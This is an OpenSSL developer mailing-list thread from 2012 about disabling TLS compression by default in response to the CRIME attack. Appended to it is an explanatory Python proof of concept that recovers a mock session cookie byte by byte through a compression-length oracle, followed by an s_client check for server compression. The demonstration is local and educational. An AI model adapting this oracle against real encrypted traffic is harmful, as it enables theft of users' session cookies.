Re: OpenSSL and CRIME

2012-10-24 Thread Tomas Mraz
On Tue, 2012-10-23 at 20:18 +0200, Dr. Stephen Henson wrote: 
 On Tue, Oct 23, 2012, Tomas Hoger wrote:
 
  On Thu, 18 Oct 2012 23:55:41 +0200 Andrey Kulikov wrote:
  
OpenSSL enables zlib by default.
   
   Could you please advise for what version and platform this is true?
   
   openssl-1.0.1c for linux-elf
   has no-zlib configured by default.
  
  Sorry, I asked the wrong way.  OpenSSL, when compiled with zlib
  support, enables deflate (id 1) compression by default.  I was
  wondering if this should stay as is or should change to disabled by
  default even when zlib support is compiled in (i.e. compression will
  only get used when explicitly enabled by an application using the
  library).  The change would render SSL_OP_NO_COMPRESSION meaningless
  and possibly want a new option for doing the opposite.
  
 
 There isn't any room in the options field for new options, so that's tricky.
 An alternative would be to set SSL_OP_NO_COMPRESSION by default and require
 applications that need compression support to explicitly clear it with 
 SSL_CTX_clear_options(ctx, SSL_OP_NO_COMPRESSION);

I agree this is the solution that should be used as this does not break
the ABI.
-- 
Tomas Mraz
No matter how far down the wrong road you've gone, turn back.
  Turkish proverb

__
OpenSSL Project http://www.openssl.org
Development Mailing List   openssl-dev@openssl.org
Automated List Manager   majord...@openssl.org


Re: OpenSSL and CRIME

2012-10-23 Thread Tomas Hoger
On Thu, 18 Oct 2012 23:55:41 +0200 Andrey Kulikov wrote:

  OpenSSL enables zlib by default.
 
 Could you please advise for what version and platform this is true?
 
 openssl-1.0.1c for linux-elf
 has no-zlib configured by default.

Sorry, I asked the wrong way.  OpenSSL, when compiled with zlib
support, enables deflate (id 1) compression by default.  I was
wondering if this should stay as is or should change to disabled by
default even when zlib support is compiled in (i.e. compression will
only get used when explicitly enabled by an application using the
library).  The change would render SSL_OP_NO_COMPRESSION meaningless
and possibly want a new option for doing the opposite.

-- 
Tomas Hoger


Re: OpenSSL and CRIME

2012-10-23 Thread Dr. Stephen Henson
On Tue, Oct 23, 2012, Tomas Hoger wrote:

 On Thu, 18 Oct 2012 23:55:41 +0200 Andrey Kulikov wrote:
 
   OpenSSL enables zlib by default.
  
  Could you please advise for what version and platform this is true?
  
  openssl-1.0.1c for linux-elf
  has no-zlib configured by default.
 
 Sorry, I asked the wrong way.  OpenSSL, when compiled with zlib
 support, enables deflate (id 1) compression by default.  I was
 wondering if this should stay as is or should change to disabled by
 default even when zlib support is compiled in (i.e. compression will
 only get used when explicitly enabled by an application using the
 library).  The change would render SSL_OP_NO_COMPRESSION meaningless
 and possibly want a new option for doing the opposite.
 

There isn't any room in the options field for new options, so that's tricky.
An alternative would be to set SSL_OP_NO_COMPRESSION by default and require
applications that need compression support to explicitly clear it with 
SSL_CTX_clear_options(ctx, SSL_OP_NO_COMPRESSION);

Steve.
--
Dr Stephen N. Henson. OpenSSL project core developer.
Commercial tech support now available see: http://www.openssl.org


Re: OpenSSL and CRIME

2012-10-18 Thread Andrey Kulikov
Hi,

 OpenSSL enables zlib by default.

Could you please advise for what version and platform this is true?

openssl-1.0.1c for linux-elf
has no-zlib configured by default.


Re: OpenSSL and CRIME

2012-10-10 Thread Ben Laurie
On Mon, Oct 8, 2012 at 5:13 PM, Tomas Hoger tho...@redhat.com wrote:

 Hi!

 Are there any plans to apply any changes to OpenSSL related to the
 recent CRIME attack?  Unlike other libraries (e.g. GnuTLS or NSS),
 OpenSSL enables zlib by default.  Is there a plan to change the default
 in response to the published attack?  I'm aware of the existing
 SSL_OP_NO_COMPRESSION option as a workaround.

 Thank you!


It's an interesting point - perhaps we should change the default.



 --
 Tomas Hoger



OpenSSL and CRIME

2012-10-08 Thread Tomas Hoger
Hi!

Are there any plans to apply any changes to OpenSSL related to the
recent CRIME attack?  Unlike other libraries (e.g. GnuTLS or NSS),
OpenSSL enables zlib by default.  Is there a plan to change the default
in response to the published attack?  I'm aware of the existing
SSL_OP_NO_COMPRESSION option as a workaround.

Thank you!

-- 
Tomas Hoger
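The attack Tomas asks about, and the reason Steve's proposal to set SSL_OP_NO_COMPRESSION by default matters, as an added example that is not part of the thread and is not OpenSSL code: a Python model of the CRIME length oracle built on the zlib module, i.e. the deflate method the list refers to as compression id 1. Everything in it is constructed: the request layout, the cookie name and value, the use of zlib's Z_FIXED strategy (static Huffman tables, so each literal costs exactly 8 or 9 bits and the outcome is deterministic; TLS uses zlib's default strategy, which only makes the signal noisier), and the 0x90..0x97 padding bytes used to test each guess at every bit alignment. The attacker is assumed to know the cookie's name and length, to control the request path, and to see only the size of the encrypted record.

```python
"""Added example (not from the OpenSSL thread): the compression length
oracle behind CRIME, modelled with zlib on a constructed HTTPS request."""
import zlib

# Constructed values for the demonstration: a hypothetical session cookie.
SECRET = b"7f3a9c2e"
COOKIE_NAME = b"session="
HEX = b"0123456789abcdef"
# Eight distinct bytes >= 0x90: each is a 9-bit literal under fixed Huffman
# coding, so k of them shift the bit alignment of the output by k bits.
PADDING = bytes(range(0x90, 0x98))


def build_record(path: bytes, secret: bytes = SECRET) -> bytes:
    """Plaintext of one modelled request: the attacker chooses the path (for
    example via an injected image URL) and the browser appends the secret
    cookie.  Constructed layout, not captured traffic."""
    return (b"GET /" + path + b" HTTP/1.1\r\n"
            b"Host: example.com\r\n"
            b"Cookie: " + COOKIE_NAME + secret + b"\r\n\r\n")


def compressed_len(plaintext: bytes, strategy: int = zlib.Z_FIXED) -> int:
    """Size of the record after deflate.  Encryption hides the content but
    not this number.  Z_FIXED is an assumption made here for determinism;
    TLS compression used zlib's default (dynamic Huffman) strategy."""
    co = zlib.compressobj(6, zlib.DEFLATED, 15, 8, strategy)
    return len(co.compress(plaintext) + co.flush())


def oracle_score(candidate: bytes, secret: bytes = SECRET) -> int:
    """Sum the compressed length over paddings of 0..7 high bytes so the
    candidate is measured at every bit alignment.  When the candidate's last
    byte is right, the LZ77 back-reference from the cookie into the path grows
    by one byte and one literal disappears, so the total is strictly smaller
    than for any wrong byte."""
    return sum(compressed_len(build_record(candidate + PADDING[:k], secret))
               for k in range(8))


def recover_secret(secret: bytes = SECRET, alphabet: bytes = HEX) -> bytes:
    """Recover the cookie value one byte at a time using only oracle_score().
    The attacker knows the cookie name and (assumed here) its length."""
    known = COOKIE_NAME
    for _ in range(len(secret)):
        best = min((bytes([c]) for c in alphabet),
                   key=lambda guess: oracle_score(known + guess, secret))
        known += best
    return known[len(COOKIE_NAME):]


if __name__ == "__main__":
    recovered = recover_secret()
    print("recovered cookie value:", recovered.decode())
    print("matches secret:", recovered == SECRET)
```

Each byte costs 8 paddings times 16 candidates, i.e. 128 requests, and the attacker never needs a key: the leak is the plaintext length surviving compression, which is why the only real fix is not to compress secrets together with attacker-controlled data. To check a deployed server, `openssl s_client -connect host:443` reports `Compression: NONE` in its session summary when no compression was negotiated; anything else is the condition the thread wants OpenSSL to stop producing by default.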